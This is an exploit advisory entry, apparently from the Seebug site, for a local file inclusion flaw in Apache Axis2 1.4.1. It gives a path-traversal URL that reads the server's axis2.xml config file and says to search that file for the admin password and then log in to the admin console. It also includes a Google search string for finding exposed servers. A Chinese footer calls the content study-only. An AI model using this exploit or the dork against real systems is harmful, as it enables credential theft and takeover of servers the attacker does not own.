# Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability # Date: 2010/5/24 # Author: HC # Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi # Version: Axis2 1.4.1 # Tested on: Linux # category: Webapps # Code : 1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml (ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml) 2. search keyword "password". (Get username and password) 3. Login http://Domain Name/axis2/axis2-admin/ google: inurl:"axis2/services" "list Services"
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论